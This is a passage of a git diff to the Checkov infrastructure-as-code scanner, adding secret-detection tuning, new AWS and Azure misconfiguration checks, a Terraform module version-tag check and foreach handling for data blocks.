runner_filter.sast_languages: runner_filter.sast_languages.remove(SastLanguages.GOLANG) - if CDKLanguages.GOLANG in self.cdk_langs: - self.cdk_langs.remove(CDKLanguages.GOLANG) # registry get all the paths self.registry.set_runner_filter(runner_filter) diff --git a/checkov/secrets/plugins/detector_utils.py b/checkov/secrets/plugins/detector_utils.py index 7ff55919d0b..3bed63d0778 100644 --- a/checkov/secrets/plugins/detector_utils.py +++ b/checkov/secrets/plugins/detector_utils.py @@ -26,6 +26,8 @@ MAX_KEYWORD_LIMIT = 500 +B64_FP_REGEX = re.compile(r'\b[A-Za-z]+_+[A-Za-z_]*[A-Za-z]\b') + DENY_LIST_REGEX = r'|'.join(DENYLIST) # Support for suffix after keyword i.e. password_secure = "value" DENY_LIST_REGEX2 = r'({denylist}){suffix}'.format( @@ -198,11 +200,17 @@ def remove_fp_secrets_in_keys(detected_secrets: set[PotentialSecret], line: str, key, value = line.split("=", 1) if detected_secret.secret_value in key and detected_secret.secret_value in value: secrets_to_remove.add(detected_secret) + # strings which are all lower/upper case letters are suspected to not be base64 high entropy strings + # the 2nd part of the end is to make test_non_multiline_pair_time_limit_creating_report pass + if B64_FP_REGEX.search(detected_secret.secret_value) and "SECRET" not in detected_secret.secret_value: + secrets_to_remove.add(detected_secret) detected_secrets -= secrets_to_remove def get_processed_line(formatted_line: str, secret_value: str) -> str: - if not formatted_line.startswith(secret_value) and formatted_line.find(":", formatted_line.rfind(secret_value) + len(secret_value)) > -1: + if not formatted_line.startswith(secret_value) and formatted_line.find(":", + formatted_line.rfind(secret_value) + len( + secret_value)) > -1: return formatted_line[formatted_line.find(secret_value):] return formatted_line diff --git a/checkov/secrets/plugins/entropy_keyword_combinator.py b/checkov/secrets/plugins/entropy_keyword_combinator.py index b542897b52d..02aeb568095 100644 --- a/checkov/secrets/plugins/entropy_keyword_combinator.py +++ b/checkov/secrets/plugins/entropy_keyword_combinator.py @@ -1,6 +1,7 @@ from __future__ import annotations import re +import os from typing import Generator, Set, Tuple from typing import Any from typing import TYPE_CHECKING @@ -29,7 +30,7 @@ MAX_LINE_LENGTH = 10000 MAX_KEYWORD_LIMIT = 500 -ENTROPY_KEYWORD_COMBINATOR_LIMIT = 3 +ENTROPY_KEYWORD_COMBINATOR_LIMIT = float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3')) ENTROPY_KEYWORD_LIMIT = 4.8 DENY_LIST_REGEX = r'|'.join(DENYLIST) @@ -118,10 +119,18 @@ class EntropyKeywordCombinator(BasePlugin): secret_type = "" # nosec # noqa: CCE003 # a static attribute - def __init__(self, limit: float = ENTROPY_KEYWORD_LIMIT, max_line_length: int = MAX_LINE_LENGTH) -> None: - iac_limit = ENTROPY_KEYWORD_COMBINATOR_LIMIT - self.high_entropy_scanners_iac = (Base64HighEntropyString(limit=iac_limit), HexHighEntropyString(limit=iac_limit)) - self.entropy_scanners_non_iac_with_keyword = (Base64HighEntropyString(limit=iac_limit + 0.3), HexHighEntropyString(limit=iac_limit + 0.3)) + def __init__(self, limit: float = ENTROPY_KEYWORD_LIMIT, max_line_length: int = MAX_LINE_LENGTH, + entropy_limit: float = ENTROPY_KEYWORD_COMBINATOR_LIMIT) -> None: + self.entropy_limit = entropy_limit + self.high_entropy_scanners_iac = ( + Base64HighEntropyString( + limit=entropy_limit), HexHighEntropyString( + limit=entropy_limit)) + self.entropy_scanners_non_iac_with_keyword = ( + Base64HighEntropyString( + limit=entropy_limit + 0.3), + HexHighEntropyString( + limit=entropy_limit + 0.3)) self.high_entropy_scanners = (Base64HighEntropyString(limit=limit), HexHighEntropyString(limit=limit)) self.keyword_scanner = KeywordDetector() self.max_line_length = max_line_length diff --git a/checkov/secrets/runner.py b/checkov/secrets/runner.py index 1dc5dea5f28..075a3a8f4b6 100644 --- a/checkov/secrets/runner.py +++ b/checkov/secrets/runner.py @@ -73,7 +73,8 @@ 'Hex High Entropy String': 'CKV_SECRET_19' } -ENTROPY_CHECK_IDS = ('CKV_SECRET_6', 'CKV_SECRET_19', 'CKV_SECRET_80') +ENTROPY_CHECK_IDS = {'CKV_SECRET_6', 'CKV_SECRET_19', 'CKV_SECRET_80'} +GENERIC_PRIVATE_KEY_CHECK_IDS = {'CKV_SECRET_10', 'CKV_SECRET_13'} CHECK_ID_TO_SECRET_TYPE = {v: k for k, v in SECRET_TYPE_TO_ID.items()} @@ -84,10 +85,15 @@ class Runner(BaseRunner[None, None, None]): check_type = CheckType.SECRETS # noqa: CCE003 # a static attribute - def __init__(self, file_extensions: Iterable[str] | None = None, file_names: Iterable[str] | None = None): + def __init__( + self, + file_extensions: Iterable[str] | None = None, + file_names: Iterable[str] | None = None, + entropy_limit: Optional[float] = None): super().__init__(file_extensions, file_names) self.secrets_coordinator = SecretsCoordinator() self.history_secret_store = GitHistorySecretStore() + self.entropy_limit = entropy_limit or float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3')) def set_history_secret_store(self, value: Dict[str, List[EnrichedPotentialSecret]]) -> None: self.history_secret_store.secrets_by_file_value_type = value @@ -121,7 +127,8 @@ def run( {'name': 'SquareOAuthDetector'}, {'name': 'StripeDetector'}, {'name': 'TwilioKeyDetector'}, - {'name': 'EntropyKeywordCombinator', 'path': f'file://{current_dir}/plugins/entropy_keyword_combinator.py'} + {'name': 'EntropyKeywordCombinator', 'path': f'file://{current_dir}/plugins/entropy_keyword_combinator.py', + 'entropy_limit': self.entropy_limit} ] # load runnable plugins @@ -138,7 +145,8 @@ def run( policies_list = customer_run_config.get('secretsPolicies', []) suppressions = customer_run_config.get('suppressions', []) if suppressions: - secret_suppressions_id = [suppression['policyId'] for suppression in suppressions if suppression['suppressionType'] == 'SecretsPolicy'] + secret_suppressions_id = [suppression['policyId'] + for suppression in suppressions if suppression['suppressionType'] == 'SecretsPolicy'] if policies_list: runnable_plugins: dict[str, str] = get_runnable_plugins(policies_list) logging.info(f"Found {len(runnable_plugins)} runnable plugins") @@ -188,8 +196,10 @@ def run( if enable_secret_scan_all_files: # 'excluded_paths' shouldn't include the static paths from 'EXCLUDED_PATHS' # they are separately referenced inside the 'filter_excluded_paths' function - filter_excluded_paths(root_dir=root, names=d_names, excluded_paths=runner_filter.excluded_paths) - filter_excluded_paths(root_dir=root, names=f_names, excluded_paths=runner_filter.excluded_paths) + filter_excluded_paths( + root_dir=root, names=d_names, excluded_paths=runner_filter.excluded_paths) + filter_excluded_paths( + root_dir=root, names=f_names, excluded_paths=runner_filter.excluded_paths) else: filter_ignored_paths(root, d_names, excluded_paths) filter_ignored_paths(root, f_names, excluded_paths) @@ -198,7 +208,7 @@ def run( if is_dockerfile(file): if 'dockerfile' not in block_list_secret_scan_lower: files_to_scan.append(os.path.join(root, file)) - elif f".{file.split('.')[-1]}" not in block_list_secret_scan_lower: + elif f".{file.split('.')[-1]}" not in block_list_secret_scan_lower and file not in block_list_secret_scan_lower: files_to_scan.append(os.path.join(root, file)) elif file not in PROHIBITED_FILES and f".{file.split('.')[-1]}" in SUPPORTED_FILE_EXTENSIONS or is_dockerfile( file): @@ -235,9 +245,8 @@ def run( f"Removing secret due to UUID filtering: {hashlib.sha256(secret.secret_value.encode('utf-8')).hexdigest()}") continue if secret_key in secret_records.keys(): - if secret_records[secret_key].check_id in ENTROPY_CHECK_IDS and check_id not in ENTROPY_CHECK_IDS: - secret_records.pop(secret_key) - else: + is_prioritise = self._prioritise_secrets(secret_records, secret_key, check_id) + if not is_prioritise: continue bc_check_id = metadata_integration.get_bc_id(check_id) if bc_check_id in secret_suppressions_id: @@ -310,6 +319,17 @@ def run( self._modify_invalid_secrets_check_result_to_skipped(report) return report + @staticmethod + def _prioritise_secrets(secret_records: Dict[str, SecretsRecord], secret_key: str, check_id: str) -> bool: + if secret_records[secret_key].check_id in ENTROPY_CHECK_IDS and check_id not in ENTROPY_CHECK_IDS: + secret_records.pop(secret_key) + return True + if secret_records[secret_key].check_id in GENERIC_PRIVATE_KEY_CHECK_IDS: + if check_id not in GENERIC_PRIVATE_KEY_CHECK_IDS | ENTROPY_CHECK_IDS: + secret_records.pop(secret_key) + return True + return False + def cleanup_plugin_files( self, work_path: str, @@ -423,7 +443,8 @@ def verify_secrets(self, report: Report, enriched_secrets_s3_path: str) -> Verif validate_secrets_tenant_config = None if bc_integration.customer_run_config_response is not None: - validate_secrets_tenant_config = bc_integration.customer_run_config_response.get('tenantConfig', {}).get('secretsValidate') + validate_secrets_tenant_config = bc_integration.customer_run_config_response.get( + 'tenantConfig', {}).get('secretsValidate') if validate_secrets_tenant_config is None and not convert_str_to_bool(os.getenv("CKV_VALIDATE_SECRETS", False)): logging.debug('Secrets verification is off, enable it via code configuration screen') diff --git a/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml b/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml new file mode 100644 index 00000000000..ddd82313122 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml @@ -0,0 +1,43 @@ +metadata: + id: "CKV2_AWS_67" + name: "Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation" + category: "ENCRYPTION" +definition: + and: + - cond_type: filter + attribute: resource_type + value: + - aws_s3_bucket_server_side_encryption_configuration + operator: within + - cond_type: connection + resource_types: + - aws_s3_bucket + connected_resource_types: + - aws_s3_bucket_server_side_encryption_configuration + operator: exists + - cond_type: connection + resource_types: + - aws_s3_bucket_server_side_encryption_configuration + connected_resource_types: + - aws_kms_key + operator: exists + - cond_type: attribute + resource_types: + - aws_s3_bucket_server_side_encryption_configuration + attribute: rule.apply_server_side_encryption_by_default.sse_algorithm + operator: within + value: + - "aws:kms" + - "aws:kms:dsse" + - cond_type: attribute + resource_types: + - aws_kms_key + attribute: is_enabled + operator: not_equals + value: "false" + - cond_type: attribute + resource_types: + - aws_kms_key + attribute: enable_key_rotation + operator: equals + value: "true" diff --git a/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml b/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml new file mode 100644 index 00000000000..7060abf6142 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml @@ -0,0 +1,25 @@ +metadata: + id: "CKV2_AWS_68" + name: "Ensure SageMaker notebook instance IAM policy is not overly permissive" + category: "NETWORKING" + +definition: + and: + - cond_type: filter + value: + - aws_sagemaker_notebook_instance + operator: within + attribute: resource_type + - cond_type: connection + resource_types: + - aws_sagemaker_notebook_instance + connected_resource_types: + - aws_iam_role + operator: exists + - cond_type: attribute + resource_types: + - aws_iam_role + attribute: "policy.Statement[?(@.Effect == Allow)].Action[*]" + operator: "jsonpath_not_equals" + value: "*" + diff --git a/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml b/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml index 325bfcb5974..edd6f0a6c6c 100644 --- a/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml +++ b/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml @@ -22,18 +22,6 @@ definition: attribute: "route.*.cidr_block" operator: "not_contains" value: "0.0.0.0/0" - - cond_type: "attribute" - resource_types: - - "aws_route_table" - attribute: "route.*.cidr_block" - operator: "not_contains" - value: "0.0.0.0" - - cond_type: "attribute" - resource_types: - - "aws_route_table" - attribute: "route.*.ipv6_cidr_block" - operator: "not_contains" - value: "::0" - cond_type: "attribute" resource_types: - "aws_route_table" @@ -58,18 +46,6 @@ definition: attribute: "destination_cidr_block" operator: "not_contains" value: "0.0.0.0/0" - - cond_type: "attribute" - resource_types: - - "aws_route" - attribute: "destination_cidr_block" - operator: "not_contains" - value: "0.0.0.0" - - cond_type: "attribute" - resource_types: - - "aws_route" - attribute: "destination_ipv6_cidr_block" - operator: "not_contains" - value: "::0" - cond_type: "attribute" resource_types: - "aws_route" diff --git a/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml new file mode 100644 index 00000000000..316387f331e --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml @@ -0,0 +1,36 @@ +metadata: + id: "CKV2_AZURE_50" + name: "Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible" + category: "NETWORKING" + +definition: + or: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_machine_learning_workspace + - cond_type: attribute + resource_types: azurerm_machine_learning_workspace + attribute: high_business_impact + operator: equals + value: false + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_machine_learning_workspace + - cond_type: connection + resource_types: + - azurerm_machine_learning_workspace + connected_resource_types: + - azurerm_storage_account + operator: exists + - cond_type: attribute + resource_types: azurerm_storage_account + attribute: public_network_access_enabled + operator: equals + value: false + + diff --git a/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml new file mode 100644 index 00000000000..4257b465792 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml @@ -0,0 +1,16 @@ +metadata: + id: "CKV2_AZURE_49" + name: "Ensure that Azure Machine learning workspace is not configured with overly permissive network access" + category: "NETWORKING" +definition: + or: + - cond_type: "attribute" + resource_types: "azurerm_machine_learning_workspace" + attribute: "public_network_access_enabled" + operator: "not_exists" + - cond_type: "attribute" + resource_types: "azurerm_machine_learning_workspace" + attribute: "public_network_access_enabled" + operator: "equals" + value: "false" + diff --git a/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml b/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml new file mode 100644 index 00000000000..48c03706f76 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml @@ -0,0 +1,45 @@ +metadata: + id: "CKV2_AZURE_48" + name: "Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption" + category: "ENCRYPTION" +definition: + or: + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_databricks_workspace + - resource_types: + - azurerm_databricks_workspace + operator: not_equals + cond_type: attribute + attribute: sku + value: "premium" + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_databricks_workspace + - resource_types: + - azurerm_databricks_workspace + operator: equals + cond_type: attribute + attribute: sku + value: "premium" + - resource_types: + - azurerm_databricks_workspace + operator: equals + cond_type: attribute + attribute: customer_managed_key_enabled + value: true + - resource_types: + - azurerm_databricks_workspace + connected_resource_types: + - azurerm_databricks_workspace_root_dbfs_customer_managed_key + operator: exists + cond_type: connection + +# Root DBFS encryption is only valid if the Databricks Workspace sku is set to 'premium'. +# https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/databricks_workspace#customer_managed_key_enabled \ No newline at end of file diff --git a/checkov/terraform/checks/module/base_module_check.py b/checkov/terraform/checks/module/base_module_check.py index 62f0d0eceb4..df2189d8e5e 100644 --- a/checkov/terraform/checks/module/base_module_check.py +++ b/checkov/terraform/checks/module/base_module_check.py @@ -45,3 +45,7 @@ def scan_entity_conf(self, conf: Dict[str, List[Any]], entity_type: str) -> Chec @abstractmethod def scan_module_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: raise NotImplementedError() + + @staticmethod + def is_git_source(source: str) -> bool: + return source.startswith('git@') or source.startswith('git::') or source.startswith('github.com') or source.startswith('bitbucket.org') diff --git a/checkov/terraform/checks/module/generic/RevisionVersionTag.py b/checkov/terraform/checks/module/generic/RevisionVersionTag.py new file mode 100644 index 00000000000..34a7b85072d --- /dev/null +++ b/checkov/terraform/checks/module/generic/RevisionVersionTag.py @@ -0,0 +1,41 @@ +from __future__ import annotations + +import re +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.terraform.checks.module.base_module_check import BaseModuleCheck +from .RevisionHash import check as RevisionHashCheck + +VERSION_PATTERN = re.compile(r"[?&](ref=).*(\d\.\d).*") + + +class RevisionVersionTag(BaseModuleCheck): + def __init__(self) -> None: + name = "Ensure Terraform module sources use a tag with a version number" + id = "CKV_TF_2" + categories = [CheckCategories.SUPPLY_CHAIN] + super().__init__(name=name, id=id, categories=categories) + + def scan_module_conf(self, conf: dict[str, list[Any]]) -> CheckResult: + # this check is a more lenient version of the hash check, so if that one passes (or is unknown due to a local module), + # then we are done + hash_result = RevisionHashCheck.scan_module_conf(conf) + if hash_result != CheckResult.FAILED: + return hash_result + + source = conf.get("source") + if source and isinstance(source, list): + source_url = source[0] + if BaseModuleCheck.is_git_source(source_url): + if ("?ref" in source_url or "&ref" in source_url) and re.search(VERSION_PATTERN, source_url): + return CheckResult.PASSED + else: + version = conf.get("version") + if source and isinstance(version, list): + return CheckResult.PASSED + + return CheckResult.FAILED + + +check = RevisionVersionTag() diff --git a/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py b/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py new file mode 100644 index 00000000000..24fe3b80b9b --- /dev/null +++ b/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py @@ -0,0 +1,25 @@ +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CloudsearchDomainEnforceHttps(BaseResourceValueCheck): + def __init__(self): + name = "Ensure AWS Cognito identity pool does not allow unauthenticated guest access" + id = "CKV_AWS_366" + supported_resources = ["aws_cognito_identity_pool"] + categories = [CheckCategories.IAM] + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + ) + + def get_inspected_key(self) -> str: + return "allow_unauthenticated_identities" + + def get_expected_value(self) -> bool: + return False + + +check = CloudsearchDomainEnforceHttps() diff --git a/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py index 56fa9aaa522..d98dd54e218 100644 --- a/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py +++ b/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py @@ -19,7 +19,7 @@ def scan_resource_conf(self, conf): :return: """ if "transit_encryption_enabled" in conf.keys() and conf["transit_encryption_enabled"][0] \ - and "auth_token" in conf.keys(): + and ("auth_token" in conf.keys() or "user_group_ids" in conf.keys()): return CheckResult.PASSED return CheckResult.FAILED diff --git a/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py b/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py index 42cb441b385..7b1ffb6c602 100644 --- a/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py +++ b/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py @@ -38,7 +38,8 @@ def check_conditions(statement) -> bool: if any(condition_type in condition for condition_type in string_conditions): for condition_type in string_conditions: if condition_type in condition: - if any(source in condition[condition_type] for source in ['aws:sourceVpce', 'aws:SourceVpc']): + if any(source in condition[condition_type] for source in ['aws:sourceVpce', 'aws:SourceVpc', + 'aws:PrincipalOrgPath', 'aws:userid']): return True # Default fail if none of the above conditions are met diff --git a/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py b/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py index 70b6d7f5980..a73419f486f 100644 --- a/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py +++ b/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py @@ -5,9 +5,9 @@ class SagemakerDomainEncryptedWithCMK(BaseResourceValueCheck): def __init__(self): - name = "Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK)" + name = "Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)" id = "CKV_AWS_187" - supported_resources = ['aws_sagemaker_domain'] + supported_resources = ['aws_sagemaker_domain', 'aws_sagemaker_notebook_instance'] categories = [CheckCategories.ENCRYPTION] super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) diff --git a/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py b/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py index d3d86d41151..2249f55ac5b 100644 --- a/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py +++ b/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py @@ -21,14 +21,14 @@ def scan_resource_conf(self, conf) -> CheckResult: if site_config.get('application_stack') and isinstance(site_config.get('application_stack'), list): stack = site_config.get('application_stack')[0] if stack.get('dotnet_version') and isinstance(stack.get('dotnet_version'), list): - if stack.get('dotnet_version')[0] == "v7.0": + if stack.get('dotnet_version')[0] == "v8.0": return CheckResult.PASSED return CheckResult.FAILED return CheckResult.UNKNOWN def get_expected_values(self) -> List[str]: - return ["v6.0", "v7.0"] + return ["v6.0", "v8.0"] check = AppServiceDotnetFrameworkVersion() diff --git a/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py b/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py new file mode 100644 index 00000000000..7b544f785c2 --- /dev/null +++ b/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py @@ -0,0 +1,21 @@ +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesDisablesPublicNetwork(BaseResourceValueCheck): + def __init__(self): + name = "Ensure that Cognitive Services account is not configured with managed identity" + id = "CKV_AZURE_238" + supported_resources = ['azurerm_cognitive_account'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "identity/[0]/type" + + def get_expected_value(self): + return ANY_VALUE + + +check = CognitiveServicesDisablesPublicNetwork() diff --git a/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py b/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py new file mode 100644 index 00000000000..31a3604595e --- /dev/null +++ b/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py @@ -0,0 +1,25 @@ +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesEnableLocalAuth(BaseResourceValueCheck): + def __init__(self): + name = "Ensure that Cognitive Services accounts enable local authentication" + id = "CKV_AZURE_236" + supported_resources = ('azurerm_cognitive_account', ) + categories = (CheckCategories.NETWORKING, ) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + ) + + def get_inspected_key(self): + return 'local_auth_enabled' + + def get_expected_value(self): + return False + + +check = CognitiveServicesEnableLocalAuth() diff --git a/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py b/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py index f79c9f79217..357af9c78fd 100644 --- a/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py +++ b/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py @@ -5,7 +5,7 @@ class DatabricksWorkspaceIsNotPublic(BaseResourceNegativeValueCheck): def __init__(self): - name = "Ensure that databricks workspace is not public" + name = "Ensure Databricks Workspace data plane to control plane communication happens over private link" id = "CKV_AZURE_158" supported_resources = ['azurerm_databricks_workspace'] categories = [CheckCategories.NETWORKING] diff --git a/checkov/terraform/graph_builder/foreach/builder.py b/checkov/terraform/graph_builder/foreach/builder.py index f19d0b009d5..ffaf7bca36d 100644 --- a/checkov/terraform/graph_builder/foreach/builder.py +++ b/checkov/terraform/graph_builder/foreach/builder.py @@ -2,6 +2,7 @@ import typing +from checkov.terraform.graph_builder.foreach.data_handler import ForeachDataHandler from checkov.terraform.graph_builder.foreach.module_handler import ForeachModuleHandler from checkov.terraform.graph_builder.foreach.resource_handler import ForeachResourceHandler from checkov.terraform.graph_builder.graph_components.block_types import BlockType @@ -14,12 +15,21 @@ class ForeachBuilder: def __init__(self, local_graph: TerraformLocalGraph): self._resource_handler = ForeachResourceHandler(local_graph) self._module_handler = ForeachModuleHandler(local_graph) + self._data_handler = ForeachDataHandler(local_graph) def handle(self, foreach_blocks: dict[str, list[int]]) -> None: + """ + First Data blocks that Modules can inherit from are handled. + Second, Module blocks are handled. + Last Resource blocks that can be duplicate by the Modules rendering. + """ + if self._data_handler.local_graph.enable_datas_foreach_handling: + if foreach_blocks.get(BlockType.DATA): + self._data_handler.handle(foreach_blocks[BlockType.DATA]) + self._data_handler.local_graph._arrange_graph_data() + self._data_handler.local_graph._build_edges() if self._module_handler.local_graph.enable_modules_foreach_handling: if foreach_blocks.get(BlockType.MODULE): self._module_handler.handle(foreach_blocks[BlockType.MODULE]) - self._module_handler.local_graph._arrange_graph_data() - self._module_handler.local_graph._build_edges() if self._module_handler.local_graph.enable_foreach_handling: self._resource_handler.handle(foreach_blocks.get(BlockType.RESOURCE, [])) diff --git a/checkov/terraform/graph_builder/foreach/data_handler.py b/checkov/terraform/graph_builder/foreach/data_handler.py new file mode 100644 index 00000000000..f5a343471b2 --- /dev/null +++ b/checkov/terraform/graph_builder/foreach/data_handler.py @@ -0,0 +1,14 @@ +from __future__ import annotations + +from checkov.terraform.graph_builder.graph_components.block_types import BlockType +from checkov.terraform.graph_builder.foreach.foreach_entity_handler import ForeachEntityHandler + +from typing import TYPE_CHECKING + +if TYPE_CHECKING: + from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph + + +class ForeachDataHandler(ForeachEntityHandler): + def __init__(self, local_graph: TerraformLocalGraph) -> None: + super().__init__(local_graph, BlockType.DATA) diff --git a/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py b/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py new file mode 100644 index 00000000000..7fc4dc771df --- /dev/null +++ b/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py @@ -0,0 +1,108 @@ +from __future__ import annotations + +import logging +from typing import Any, Optional, TYPE_CHECKING + +from checkov.common.util.data_structures_utils import pickle_deepcopy +from checkov.terraform.graph_builder.foreach.abstract_handler import ForeachAbstractHandler +from checkov.terraform.graph_builder.foreach.consts import FOR_EACH_BLOCK_TYPE, FOREACH_STRING, COUNT_STRING +from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock + +if TYPE_CHECKING: + from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph + + +class ForeachEntityHandler(ForeachAbstractHandler): + def __init__(self, local_graph: TerraformLocalGraph, block_type_to_handle: str) -> None: + super().__init__(local_graph) + self.block_type_to_handle = block_type_to_handle + + def handle(self, resources_blocks: list[int]) -> None: + block_index_to_statement: FOR_EACH_BLOCK_TYPE = self._get_statements(resources_blocks) + self._create_new_resources(block_index_to_statement) + + def _get_statements(self, resources_blocks: list[int]) -> FOR_EACH_BLOCK_TYPE: + if not resources_blocks: + return {} + block_index_to_statement: FOR_EACH_BLOCK_TYPE = {} + for block_index, block in enumerate(self.local_graph.vertices): + if block.block_type != self.block_type_to_handle or not (FOREACH_STRING in block.attributes or COUNT_STRING in block.attributes): + continue + foreach_statement = self._get_static_foreach_statement(block_index) + block_index_to_statement[block_index] = foreach_statement + blocks_to_render = [block_idx for block_idx, statement in block_index_to_statement.items() if statement is None] + if blocks_to_render: + rendered_statements: FOR_EACH_BLOCK_TYPE = self._handle_dynamic_statement(blocks_to_render) + block_index_to_statement.update(rendered_statements) + return block_index_to_statement + + def _get_static_foreach_statement(self, block_index: int) -> Optional[list[str] | dict[str, Any] | int]: + attributes = self.local_graph.vertices[block_index].attributes + if not attributes.get(FOREACH_STRING) and not attributes.get(COUNT_STRING): + return None + try: + if self._is_static_statement(block_index): + return self._handle_static_statement(block_index) + else: + return None + except Exception as e: + logging.info( + f"Cannot get foreach statement for block: {self.local_graph.vertices[block_index]}, error: {str(e)}") + return None + + def _handle_dynamic_statement(self, blocks_to_render: list[int]) -> FOR_EACH_BLOCK_TYPE: + rendered_statements_by_idx: FOR_EACH_BLOCK_TYPE = {} + sub_graph = self._build_sub_graph(blocks_to_render) + self._render_sub_graph(sub_graph, blocks_to_render) + for block_idx in blocks_to_render: + if not self._is_static_statement(block_idx, sub_graph): + rendered_statements_by_idx[block_idx] = None + else: + rendered_statements_by_idx[block_idx] = self._handle_static_statement(block_idx, sub_graph) + return rendered_statements_by_idx + + def _create_new_resources_count(self, statement: int, block_idx: int) -> None: + main_resource = self.local_graph.vertices[block_idx] + for i in range(statement): + self._create_new_resource(main_resource, i, resource_idx=block_idx, foreach_idx=i) + + def _create_new_foreach_resource(self, block_idx: int, foreach_idx: int, main_resource: TerraformBlock, + new_key: int | str, new_value: int | str) -> None: + self._create_new_resource(main_resource, new_value, new_key=new_key, resource_idx=block_idx, foreach_idx=foreach_idx) + + def _create_new_resource( + self, + main_resource: TerraformBlock, + new_value: int | str, + resource_idx: int, + foreach_idx: int, + new_key: int | str | None = None, + ) -> None: + new_resource = pickle_deepcopy(main_resource) + block_type, block_name = new_resource.name.split('.') + key_to_val_changes = self._build_key_to_val_changes(main_resource, new_value, new_key) + config_attrs = new_resource.config.get(block_type, {}).get(block_name, 